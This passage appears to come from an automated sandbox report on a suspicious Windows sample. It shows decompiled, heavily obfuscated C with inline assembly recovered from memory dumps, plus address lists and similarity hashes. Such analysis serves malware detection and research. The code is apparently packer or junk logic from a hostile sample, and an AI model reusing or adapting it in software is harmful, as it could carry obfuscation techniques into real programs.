                                                                                                                                                    							__cl = __cl - 0x3a;
                                                                                                                                                    							 *0x8937c133 =  *0x8937c133 & __ebx;
                                                                                                                                                    							asm("rcr dword [0xcff71485], 0x88");
                                                                                                                                                    							if(__ebp >=  *0xb78c78c2) {
                                                                                                                                                    								__ebp = __ebp |  *0xafb52b72;
                                                                                                                                                    								asm("adc ebx, 0x168cc1f0");
                                                                                                                                                    								__edx = __edx - 1;
                                                                                                                                                    								asm("sbb ch, [0x7ce067a0]");
                                                                                                                                                    								 *0xfa92813f =  *0xfa92813f & __esp;
                                                                                                                                                    								 *0xd50550e5 = __al;
                                                                                                                                                    								 *0x20e06ef2 =  *0x20e06ef2 ^ __bl;
                                                                                                                                                    								 *0xd590e91b = __eax;
                                                                                                                                                    								__eax = __eax -  *0x45ce4c6c;
                                                                                                                                                    								asm("adc edx, [0xef5f6c8]");
                                                                                                                                                    								__cl = __cl &  *0xaf4c6c14;
                                                                                                                                                    								_pop(__ebx);
                                                                                                                                                    								if(__cl != 0) {
                                                                                                                                                    									__eax = __eax &  *0xff4a1874;
                                                                                                                                                    									asm("sbb edi, [0xe0bdd0d3]");
                                                                                                                                                    									 *0x4c7d20c5 =  *0x4c7d20c5 & __esp;
                                                                                                                                                    									__esi = __esi - 1;
                                                                                                                                                    									 *0xb00fc717 =  *0xb00fc717 << 0x1d;
                                                                                                                                                    									 *0xe851831 = __esi;
                                                                                                                                                    									__esi = __esp;
                                                                                                                                                    									__ah = __ah & 0x000000a8;
                                                                                                                                                    									__esi = __esi;
                                                                                                                                                    									asm("sbb dh, 0xe7");
                                                                                                                                                    									__ebx = __esi;
                                                                                                                                                    									 *0xf17e8e86 =  *0xf17e8e86 >> 0x73;
                                                                                                                                                    									__eax =  *0x5d117b31;
                                                                                                                                                    									__edi = __edi &  *0xa3bc77ed;
                                                                                                                                                    									if(__ecx == 0) {
                                                                                                                                                    										_pop( *0xf683575);
                                                                                                                                                    										asm("cmpsb");
                                                                                                                                                    										asm("sbb dh, [0xe15b1fb5]");
                                                                                                                                                    										__esi = __esi -  *0x6462e789;
                                                                                                                                                    										asm("lodsb");
                                                                                                                                                    										_pop(__esi);
                                                                                                                                                    										_pop(__ebx);
                                                                                                                                                    										__al = __al +  *0xa50b9230;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				while(1) {
                                                                                                                                                    					L1:
                                                                                                                                                    					asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    					_t79 = _t79 + 1;
                                                                                                                                                    					asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    					if((_t37 & 0x0000000a) >= 0) {
                                                                                                                                                    						continue;
                                                                                                                                                    					}
                                                                                                                                                    					L2:
                                                                                                                                                    					asm("scasb");
                                                                                                                                                    					_t55 =  *0x8a5d6305;
                                                                                                                                                    					asm("cmpsb");
                                                                                                                                                    					_push( *0xafe8b8c4);
                                                                                                                                                    					_t38 = _t37 |  *0x57bf634;
                                                                                                                                                    					asm("rcr byte [0x82141b7], 0x16");
                                                                                                                                                    					_push(_t62);
                                                                                                                                                    					asm("rcl dword [0x21ac910d], 0xe5");
                                                                                                                                                    					asm("sbb ch, [0xa3a45ad7]");
                                                                                                                                                    					asm("sbb [0xa61356b1], bh");
                                                                                                                                                    					_push(_t38);
                                                                                                                                                    					_push(_t55 + 0xba0876cf);
                                                                                                                                                    					_push( *0x32e74801);
                                                                                                                                                    					_t6 = _t62;
                                                                                                                                                    					_t62 =  *0x57856a35;
                                                                                                                                                    					 *0x57856a35 = _t6;
                                                                                                                                                    					asm("rol byte [0x8111ecb6], 0x92");
                                                                                                                                                    					 *0x550a0908 =  *0x550a0908 ^ _t38;
                                                                                                                                                    					_t54 =  *0xba69866a * 0xff7d;
                                                                                                                                                    					_push(_t44);
                                                                                                                                                    					_t39 = _t38 & 0x00000008;
                                                                                                                                                    					 *0xb6e71d0a = _t44;
                                                                                                                                                    					asm("rol byte [0x1761d412], 0x56");
                                                                                                                                                    					 *0xf083184 = _t39;
                                                                                                                                                    					asm("sbb esp, [0xdb89a2fb]");
                                                                                                                                                    					asm("cmpsw");
                                                                                                                                                    					asm("ror dword [0xe115810f], 0x13");
                                                                                                                                                    					 *0x740acff9 =  *0x740acff9 >> 0xe7;
                                                                                                                                                    					_t74 = ( *0x8e77569 * 0x0000da0a |  *0x3491b383) -  *0x830117eb;
                                                                                                                                                    					 *0x3b2bb32b =  *0x3b2bb32b - _t62;
                                                                                                                                                    					_t44 =  *0x364b2e6a * 0xb469;
                                                                                                                                                    					_t37 =  *0x1f7901fa;
                                                                                                                                                    					 *0x1f7901fa = _t39 - 1;
                                                                                                                                                    					 *0xd2bff8cf =  *0xd2bff8cf << 0;
                                                                                                                                                    					_t79 = (0xffffffff93ef5717 +  *0x3080086d |  *0xe34b4d3b) - 0x9ceffbdf;
                                                                                                                                                    					 *0xe88f63f7 =  *0xe88f63f7 ^ 0x90f9ad25;
                                                                                                                                                    					if( *0xe88f63f7 == 0) {
                                                                                                                                                    						while(1) {
                                                                                                                                                    							L1:
                                                                                                                                                    							asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    							_t79 = _t79 + 1;
                                                                                                                                                    							asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    							if((_t37 & 0x0000000a) >= 0) {
                                                                                                                                                    								continue;
                                                                                                                                                    							}
                                                                                                                                                    							goto L2;
                                                                                                                                                    							do {
                                                                                                                                                    								do {
                                                                                                                                                    									do {
                                                                                                                                                    										goto L1;
                                                                                                                                                    									} while ((_t37 & 0x0000000a) >= 0);
                                                                                                                                                    									goto L2;
                                                                                                                                                    								} while ( *0xe88f63f7 == 0);
                                                                                                                                                    								goto L3;
                                                                                                                                                    							} while ( *0x3be3279f > 0);
                                                                                                                                                    							 *0x2babc577 =  *0x2babc577 - _t74;
                                                                                                                                                    							_t53 = _t53 +  *0x424a9db9;
                                                                                                                                                    							_t54 = _t54 + 0x30926d8e;
                                                                                                                                                    							 *0xce31028 =  *0xce31028 >> 0xf3;
                                                                                                                                                    							 *0xf0c0aff9 =  *0xf0c0aff9 - _t37;
                                                                                                                                                    							_t48 =  *0x7c91f760 * 0xaee;
                                                                                                                                                    							_push( *0xdc88d5bb);
                                                                                                                                                    							_t44 = _t44 & 0x00000063 ^  *0x9808efbb;
                                                                                                                                                    							_t62 = _t62 - 1;
                                                                                                                                                    							 *0xef44fb8f =  *0xef44fb8f + _t48;
                                                                                                                                                    							_pop( *0x6b431bd4);
                                                                                                                                                    							 *0xd3664a3b =  *0xd3664a3b + _t44;
                                                                                                                                                    							_t37 = _t37 ^  *0x98aa13f9;
                                                                                                                                                    							if(_t37 != 0) {
                                                                                                                                                    								continue;
                                                                                                                                                    							} else {
                                                                                                                                                    								asm("sbb ebx, [0xd521607a]");
                                                                                                                                                    								 *0xfc4edb89 =  *0xfc4edb89 >> 0xfa;
                                                                                                                                                    								asm("rcr dword [0xa6216009], 0x1c");
                                                                                                                                                    								_t50 = _t48 - 1;
                                                                                                                                                    								 *0xf40b53c0 = _t50;
                                                                                                                                                    								_t48 = _t50 ^  *0x86c89b15;
                                                                                                                                                    								_t79 = _t54;
                                                                                                                                                    								_push(_t37);
                                                                                                                                                    								asm("adc ebx, 0xb9213b81");
                                                                                                                                                    								_t44 = _t44 + 1;
                                                                                                                                                    								 *0xc5516339 =  *0xc5516339 - _t37;
                                                                                                                                                    								if( *0xc5516339 == 0) {
                                                                                                                                                    									continue;
                                                                                                                                                    								} else {
                                                                                                                                                    									asm("adc esp, 0xe90ea674");
                                                                                                                                                    									 *0xdc9265ee =  *0x1175f627;
                                                                                                                                                    									 *0x6bba0e61 = _t37;
                                                                                                                                                    									asm("adc edi, [0x9584be31]");
                                                                                                                                                    									_pop(_t42);
                                                                                                                                                    									asm("movsb");
                                                                                                                                                    									return _t42;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					L3:
                                                                                                                                                    					asm("adc [0x9c51b074], ecx");
                                                                                                                                                    					 *0xae61426 = _t54;
                                                                                                                                                    					asm("movsb");
                                                                                                                                                    					 *0xdd145d4 =  *0xdd145d4 - _t62;
                                                                                                                                                    					asm("adc esi, [0x8ff90139]");
                                                                                                                                                    					_t62 = _t62 + 2;
                                                                                                                                                    					 *0xb454e0e0 =  *0xb454e0e0 - _t53;
                                                                                                                                                    					asm("adc [0xa41e48bb], esi");
                                                                                                                                                    					_pop(_t54);
                                                                                                                                                    					 *0x493bdb32 =  *0x493bdb32 >> 0x39;
                                                                                                                                                    					L1();
                                                                                                                                                    					asm("ror dword [0xb221b2e8], 0xc5");
                                                                                                                                                    					_t37 = _t37 & 0x0000001c;
                                                                                                                                                    					asm("adc ebp, [0x7ac35861]");
                                                                                                                                                    					 *0xf7154f3b =  *0xf7154f3b - 0x90f9ad25;
                                                                                                                                                    					_t48 = _t48 + 1;
                                                                                                                                                    					 *0xa24e3c15 =  *0xa24e3c15 - _t53;
                                                                                                                                                    					 *0x3be3279f =  *0x3be3279f & _t44;
                                                                                                                                                    					asm("sbb [0x9042f2c2], ebx");
                                                                                                                                                    					L1:
                                                                                                                                                    					asm("ror dword [0x57b1f009], 0x69");
                                                                                                                                                    					_t79 = _t79 + 1;
                                                                                                                                                    					asm("rol dword [0x3935b90d], 0xf3");
                                                                                                                                                    				}
                                                                                                                                                    			}
















                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5df
                                                                                                                                                    0x0041b5e6
                                                                                                                                                    0x0041b5ec
                                                                                                                                                    0x0041b5f2
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b666
                                                                                                                                                    0x0041b66c
                                                                                                                                                    0x0041b678
                                                                                                                                                    0x0041b67e
                                                                                                                                                    0x0041b68b
                                                                                                                                                    0x0041b694
                                                                                                                                                    0x0041b69e
                                                                                                                                                    0x0041b6a4
                                                                                                                                                    0x0041b6aa
                                                                                                                                                    0x0041b6ab
                                                                                                                                                    0x0041b6b7
                                                                                                                                                    0x0041b6bd
                                                                                                                                                    0x0041b6c9
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6e1
                                                                                                                                                    0x0041b6ee
                                                                                                                                                    0x0041b6f5
                                                                                                                                                    0x0041b6f6
                                                                                                                                                    0x0041b6fc
                                                                                                                                                    0x0041b703
                                                                                                                                                    0x0041b704
                                                                                                                                                    0x0041b70b
                                                                                                                                                    0x0041b711
                                                                                                                                                    0x0041b712
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b730
                                                                                                                                                    0x0041b736
                                                                                                                                                    0x0041b73c
                                                                                                                                                    0x0041b74f
                                                                                                                                                    0x0041b750
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5fe
                                                                                                                                                    0x0041b604
                                                                                                                                                    0x0041b605
                                                                                                                                                    0x0041b612
                                                                                                                                                    0x0041b618
                                                                                                                                                    0x0041b619
                                                                                                                                                    0x0041b61f
                                                                                                                                                    0x0041b625
                                                                                                                                                    0x0041b626
                                                                                                                                                    0x0041b62d
                                                                                                                                                    0x0041b632
                                                                                                                                                    0x0041b639
                                                                                                                                                    0x0041b63b
                                                                                                                                                    0x0041b641
                                                                                                                                                    0x0041b64d
                                                                                                                                                    0x0041b64e
                                                                                                                                                    0x0041b654
                                                                                                                                                    0x0041b65a
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4b6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 20f721d3c4202bc5deca7ade5d77faf9419f2aded296d3ec73a33e101a0c8007
                                                                                                                                                    • Instruction ID: 1cb0f217c05fe4c3282d479f9155223b4ec6f9c219b149af27e62c3a77850234
                                                                                                                                                    • Opcode Fuzzy Hash: 20f721d3c4202bc5deca7ade5d77faf9419f2aded296d3ec73a33e101a0c8007
                                                                                                                                                    • Instruction Fuzzy Hash: 25B19932918385CFE705DF78D88AB913FB5F786360B04425FD5A297292D3782166CF89
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d1c1a276240ea9e44afa40be6b87b6f20c8ea622e2bc16c6eb797021964f3c21
                                                                                                                                                    • Instruction ID: d13214c675eec15058a01099daf6e90ecdb5750d20146cd338cb48003fda2632
                                                                                                                                                    • Opcode Fuzzy Hash: d1c1a276240ea9e44afa40be6b87b6f20c8ea622e2bc16c6eb797021964f3c21
                                                                                                                                                    • Instruction Fuzzy Hash: 97911876414326CBCB248F06C4941B93BA2FF65751B25806EFD825F791D734CA92E7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 86caa5f8859e6a2620d37cfa22e356ad40c7430248bcb9941e4efb720772747f
                                                                                                                                                    • Instruction ID: d36d00c2027b4a1491291746305b62fd41598a179f72c274b76f296d7cc9d3a9
                                                                                                                                                    • Opcode Fuzzy Hash: 86caa5f8859e6a2620d37cfa22e356ad40c7430248bcb9941e4efb720772747f
                                                                                                                                                    • Instruction Fuzzy Hash: C4617171A002219FDB348F11C454BBBBBB5EF55714F6981A9E44D2BAD6C338A846CFB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dc44a0768bac2466c62c381d5460d46a698a40e92ce03869a98b0d3fc627d01a
                                                                                                                                                    • Instruction ID: e8da2c68f1bd2b1bccf586d8b55d39b948ef86ec79fb3c0501b3c365592f0723
                                                                                                                                                    • Opcode Fuzzy Hash: dc44a0768bac2466c62c381d5460d46a698a40e92ce03869a98b0d3fc627d01a
                                                                                                                                                    • Instruction Fuzzy Hash: 2F51D173E105259BE3408E5ACC00299B6A3EBC4314F2FC279DC689B385DAB9ED12C6C0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                    			E0041C75F(void* __eax, void* __ebx, signed char __ecx, signed int __edx, void* __esi) {
                                                                                                                                                    				signed int _t23;
                                                                                                                                                    				void* _t24;
                                                                                                                                                    				signed int _t25;
                                                                                                                                                    				signed int _t26;
                                                                                                                                                    				signed char _t29;
                                                                                                                                                    				signed char _t40;
                                                                                                                                                    				void* _t42;
                                                                                                                                                    				void* _t45;
                                                                                                                                                    				void* _t49;
                                                                                                                                                    				void* _t50;
                                                                                                                                                    				signed int _t53;
                                                                                                                                                    				signed int _t55;
                                                                                                                                                    				signed int _t56;
                                                                                                                                                    
                                                                                                                                                    				_t40 = __edx;
                                                                                                                                                    				_t38 = __ecx;
                                                                                                                                                    				 *0xb4a0470c =  *0xb4a0470c ^ __edx;
                                                                                                                                                    				_t23 = (__eax - 0xcc32c1de |  *0x16efa8e0) +  *0xc2ccecc9;
                                                                                                                                                    				_pop(_t42);
                                                                                                                                                    				asm("rol dword [0x16d24939], 0x6f");
                                                                                                                                                    				asm("rcr byte [0x3ccdc486], 0xb1");
                                                                                                                                                    				asm("sbb ebx, [0x32c1ddbd]");
                                                                                                                                                    				_t50 = _t49 -  *0x93b70016;
                                                                                                                                                    				_t29 = __ebx - 1;
                                                                                                                                                    				if(_t29 < 0) {
                                                                                                                                                    					L1:
                                                                                                                                                    					 *0x939ff7b7 =  *0x939ff7b7 >> 0xc9;
                                                                                                                                                    					 *0x8f83e7b0 =  *0x8f83e7b0 & _t38;
                                                                                                                                                    				} else {
                                                                                                                                                    					__ebx = __ebx - 0xaf88ac70;
                                                                                                                                                    					_pop(__edi);
                                                                                                                                                    					__edx = __edx & 0x16d24939;
                                                                                                                                                    					asm("rol byte [0x54942410], 0xf5");
                                                                                                                                                    					__ebp = __ebp ^  *0xef45d88d;
                                                                                                                                                    					 *0x90e04c16 =  *0x90e04c16 ^ __ebx;
                                                                                                                                                    					if( *0x90e04c16 > 0) {
                                                                                                                                                    						goto L1;
                                                                                                                                                    					} else {
                                                                                                                                                    						__eax = __eax ^  *0x45d8a8c4;
                                                                                                                                                    						__esp = __esp | 0x9e3f16ef;
                                                                                                                                                    						 *0xf9e2bc0 =  *0xf9e2bc0 >> 0xd5;
                                                                                                                                                    						asm("sbb eax, 0x40ecb2a1");
                                                                                                                                                    						 *0x8f16ef88 =  *0x8f16ef88 >> 0x9f;
                                                                                                                                                    						 *0x826380d6 =  *0x826380d6 >> 0xf5;
                                                                                                                                                    						 *0xa8c4a800 =  *0xa8c4a800 >> 0x65;
                                                                                                                                                    						__edx = __edx ^  *0x2bbc121f;
                                                                                                                                                    						asm("sbb ecx, [0xb2a10f9e]");
                                                                                                                                                    						__esp = __esp ^ 0xef8840ec;
                                                                                                                                                    						__ebp = __ebp & 0x9fe24b16;
                                                                                                                                                    						 *0x49395fc2 = __ebp;
                                                                                                                                                    						__eax =  *0xdec32e33;
                                                                                                                                                    						__eax =  *0xdec32e33 |  *0xe0cc32c1;
                                                                                                                                                    						asm("rol byte [0x6216efa8], 0x15");
                                                                                                                                                    						 *0x9a8081e2 =  *0x9a8081e2 >> 0x28;
                                                                                                                                                    						 *0xd8a8c4a8 =  *0xd8a8c4a8 & __al;
                                                                                                                                                    						__ebp = __ebp + 1;
                                                                                                                                                    						if( *0xd6b616ef < __esi) {
                                                                                                                                                    							goto L1;
                                                                                                                                                    							do {
                                                                                                                                                    								do {
                                                                                                                                                    									do {
                                                                                                                                                    										do {
                                                                                                                                                    											do {
                                                                                                                                                    												do {
                                                                                                                                                    													goto L1;
                                                                                                                                                    												} while ( *0x8f83e7b0 == 0);
                                                                                                                                                    												_push( *0xdc624d74);
                                                                                                                                                    												_t29 = _t29 |  *0xc419e217;
                                                                                                                                                    												 *0x84e5c4bb =  *0x84e5c4bb << 0xf5;
                                                                                                                                                    											} while ( *0x84e5c4bb != 0);
                                                                                                                                                    											asm("adc eax, 0xdd634e75");
                                                                                                                                                    										} while (_t40 >=  *0xaeb00218);
                                                                                                                                                    										asm("sbb edx, [0xe77cd173]");
                                                                                                                                                    										asm("lodsb");
                                                                                                                                                    										 *0xef4544a1 =  *0xef4544a1 << 0x40;
                                                                                                                                                    										asm("sbb dl, 0x1c");
                                                                                                                                                    										asm("sbb ebx, 0x32c1ddbd");
                                                                                                                                                    										asm("ror dword [0xefa8e0cc], 0xb8");
                                                                                                                                                    										asm("ror byte [0xa8e0cc32], 0x76");
                                                                                                                                                    										asm("sbb ebx, 0xc6a616ef");
                                                                                                                                                    										_t50 = _t50 -  *0x2f9d1616 + 1;
                                                                                                                                                    										 *0xc1daa919 =  *0xc1daa919 << 0xd8;
                                                                                                                                                    										asm("sbb [0xa8e0cc32], ah");
                                                                                                                                                    										 *0xc83916ef =  *0xc83916ef << 0x75;
                                                                                                                                                    									} while ( *0xc83916ef != 0);
                                                                                                                                                    									asm("rcr dword [0x997775], 0x4c");
                                                                                                                                                    									asm("rcr byte [0xd8a8c4a8], 0x67");
                                                                                                                                                    									_push(0xc68ff209);
                                                                                                                                                    									 *0x3816efa8 =  *0x3816efa8 << 0x66;
                                                                                                                                                    									_t53 = _t50 + 0x00000001 &  *0x173a7bc8;
                                                                                                                                                    									_push(_t40);
                                                                                                                                                    									_t24 = _t23 + 1;
                                                                                                                                                    									_push(_t24);
                                                                                                                                                    									_t25 = _t24 -  *0xef45d88d;
                                                                                                                                                    									 *0x81d04116 =  *0x81d04116 >> 0xf9;
                                                                                                                                                    									_push(_t25);
                                                                                                                                                    									asm("ror byte [0x4052173a], 0x23");
                                                                                                                                                    									 *0x9cba1d16 =  *0x9cba1d16 ^ _t25;
                                                                                                                                                    									_t26 = _t25;
                                                                                                                                                    									_t38 = 0xb4;
                                                                                                                                                    									asm("scasb");
                                                                                                                                                    									_push(_t53);
                                                                                                                                                    									 *0x3d99a1e7 =  *0x3d99a1e7 >> 0x5d;
                                                                                                                                                    									_t50 = _t53 + 1;
                                                                                                                                                    									_t23 = _t26 ^  *0x8daddd0f ^  *0x32ee16ef;
                                                                                                                                                    									 *0xbe0b1c6d = 0xe0cc3283;
                                                                                                                                                    									 *0x32bfddbe = 0xcc32c1ef;
                                                                                                                                                    									_t42 = _t42 +  *0xefa8e0cc;
                                                                                                                                                    									asm("sbb [0x7093ff16], esp");
                                                                                                                                                    									 *0xc5f7c62b =  *0xc5f7c62b >> 0x41;
                                                                                                                                                    									asm("sbb [0xa8e0cc32], al");
                                                                                                                                                    									 *0x34f216ef =  *0x34f216ef << 0x34;
                                                                                                                                                    									asm("adc [0xd9b004fa], ebx");
                                                                                                                                                    									asm("sbb eax, 0xe0cc32b9");
                                                                                                                                                    									 *0x2116efa8 =  *0x2116efa8 >> 0x81;
                                                                                                                                                    									asm("adc ah, 0xb3");
                                                                                                                                                    									_t29 =  *0xbe0b1c6d + 0xc6 +  *0xd601ee67;
                                                                                                                                                    									asm("ror dword [0x49395fc0], 0x32");
                                                                                                                                                    									_t40 =  *0xa2f716d2;
                                                                                                                                                    									 *0xa2f716d2 =  *0x17ff2f8a;
                                                                                                                                                    								} while (_t29 <= 0);
                                                                                                                                                    								asm("adc esi, [0x395f828e]");
                                                                                                                                                    								_t40 = _t40 + 0xd2;
                                                                                                                                                    								_t56 = _t55 - 0xb36b616;
                                                                                                                                                    								 *0xaece9d8d =  *0xaece9d8d & _t56;
                                                                                                                                                    								 *0xa8e0cc32 =  *0xa8e0cc32 | _t23;
                                                                                                                                                    								_push( *0xe0cc32c1);
                                                                                                                                                    								asm("sbb ch, 0xa8");
                                                                                                                                                    								_t23 =  *0x395fc3cc;
                                                                                                                                                    								_t38 = 0xb2;
                                                                                                                                                    								asm("sbb [0x420816d2], cl");
                                                                                                                                                    								asm("sbb edi, [0xe0cc32ba]");
                                                                                                                                                    								asm("adc esp, [0x5fbed3f5]");
                                                                                                                                                    								 *0x16d24939 =  *0x16d24939 ^ _t23;
                                                                                                                                                    								 *0x71c621c =  *0x71c621c | 0x000000b4;
                                                                                                                                                    								asm("movsb");
                                                                                                                                                    								_t50 = _t50 - 0xf2ba16ef -  *0xcc32c1db;
                                                                                                                                                    								asm("rol byte [0xfe16efa8], 0x5c");
                                                                                                                                                    								_t29 = (0x00000032 -  *0xefa8e0cc |  *0x9e8e16ef) &  *0x9a7c73a2;
                                                                                                                                                    								_t55 = _t56 |  *0x9ba0f4be;
                                                                                                                                                    								 *0xa899d1b4 =  *0xa899d1b4 & _t40;
                                                                                                                                                    								_pop(_t45);
                                                                                                                                                    								_t42 = _t45 +  *0x16d24939;
                                                                                                                                                    							} while (_t42 != 0);
                                                                                                                                                    							 *0x2e33947a =  *0x2e33947a & _t55;
                                                                                                                                                    							return _t23;
                                                                                                                                                    						} else {
                                                                                                                                                    							__edi = __edi -  *0x52173a78;
                                                                                                                                                    							__eax = __eax + 1;
                                                                                                                                                    							_push(__eax);
                                                                                                                                                    							__eax = __eax &  *0xef45d88d;
                                                                                                                                                    							__al = __al | 0x00000016;
                                                                                                                                                    							return __eax;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    			}
















                                                                                                                                                    0x0041c84f
                                                                                                                                                    0x0041c856
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x0041c4fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041c50b
                                                                                                                                                    0x0041c511
                                                                                                                                                    0x0041c517
                                                                                                                                                    0x0041c517
                                                                                                                                                    0x0041c521
                                                                                                                                                    0x0041c526
                                                                                                                                                    0x0041c52e
                                                                                                                                                    0x0041c534
                                                                                                                                                    0x0041c535
                                                                                                                                                    0x0041c542
                                                                                                                                                    0x0041c545
                                                                                                                                                    0x0041c54b
                                                                                                                                                    0x0041c55e
                                                                                                                                                    0x0041c565
                                                                                                                                                    0x0041c56b
                                                                                                                                                    0x0041c56c
                                                                                                                                                    0x0041c573
                                                                                                                                                    0x0041c579
                                                                                                                                                    0x0041c579
                                                                                                                                                    0x0041c586
                                                                                                                                                    0x0041c58d
                                                                                                                                                    0x0041c59b
                                                                                                                                                    0x0041c5a6
                                                                                                                                                    0x0041c5ad
                                                                                                                                                    0x0041c5b3
                                                                                                                                                    0x0041c5b4
                                                                                                                                                    0x0041c5b5
                                                                                                                                                    0x0041c5b6
                                                                                                                                                    0x0041c5bc
                                                                                                                                                    0x0041c5c9
                                                                                                                                                    0x0041c5d6
                                                                                                                                                    0x0041c5e4
                                                                                                                                                    0x0041c5ea
                                                                                                                                                    0x0041c5eb
                                                                                                                                                    0x0041c5f9
                                                                                                                                                    0x0041c600
                                                                                                                                                    0x0041c601
                                                                                                                                                    0x0041c608
                                                                                                                                                    0x0041c609
                                                                                                                                                    0x0041c621
                                                                                                                                                    0x0041c638
                                                                                                                                                    0x0041c63e
                                                                                                                                                    0x0041c644
                                                                                                                                                    0x0041c64a
                                                                                                                                                    0x0041c651
                                                                                                                                                    0x0041c657
                                                                                                                                                    0x0041c65e
                                                                                                                                                    0x0041c664
                                                                                                                                                    0x0041c669
                                                                                                                                                    0x0041c673
                                                                                                                                                    0x0041c676
